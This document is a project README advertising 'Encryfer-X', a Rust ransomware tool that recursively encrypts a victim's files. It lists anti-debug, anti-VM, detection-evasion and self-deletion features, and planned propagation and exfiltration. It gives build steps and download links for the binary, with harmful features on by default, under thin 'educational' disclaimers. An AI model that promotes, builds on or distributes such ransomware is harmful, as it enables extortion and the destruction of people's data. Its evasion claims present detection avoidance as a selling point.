Pronunciation: En-cry-fer-X

Encryfer-X is malicious software written in Rust, designed to encrypt files on an infected system. It recursively scans the system and applies strong encryption algorithms to render files inaccessible. A decryption tool is required to recover encrypted files.
Created by @5mukx
Algorithms Used: AES-256, ChaCha20Poly1305
⚠️ Note: This ransomware is in an early stage, created for educational and research purposes only. It is not intended to harm or disrupt others. Significant changes have been made in the private repository, with advanced techniques to be released later.
- Parallel data encryption for stealth and speed
- Anti-debug techniques (99% pass rate)
- Anti-VM techniques
- Enhanced encryption methods
- Volume-based decryption
- Random delay (10-100ms) during encryption to evade detection
- Self-deletion techniques (on timer or reboot)
Future Plans (Private):
- Polymorphic implementations
- Fileless execution
- Network propagation
- Data exfiltration
- Code obfuscation
- Time bombs
⚠️ Warning: This content is for educational purposes only. The author is not responsible for misuse or negative consequences resulting from the use of this tool.
⚠️ Note: All features, including recursive volume encryption, are enabled by default. To test safely, comment out or modify the relevant functions.
To build the code:
cargo build --release
The binary file is located at: ./target/release/Encryfer-X.exe
⚠️ Note: You need two components: a 32-byte AES key and an encrypted hex value containing AES-256 with ChaCha20Poly1305.
- Demo Video: Tweet
- Decryption Tool: Encryfer-X-Decryptor
- Key Generator: Random-Keys-Generator
- More Offensive Code: Rust for Malware Development
- Download Bundle (Decryptor + Key Generator): Link
- Download Encryfer-X: Link
- Follow for Resources: @5mukx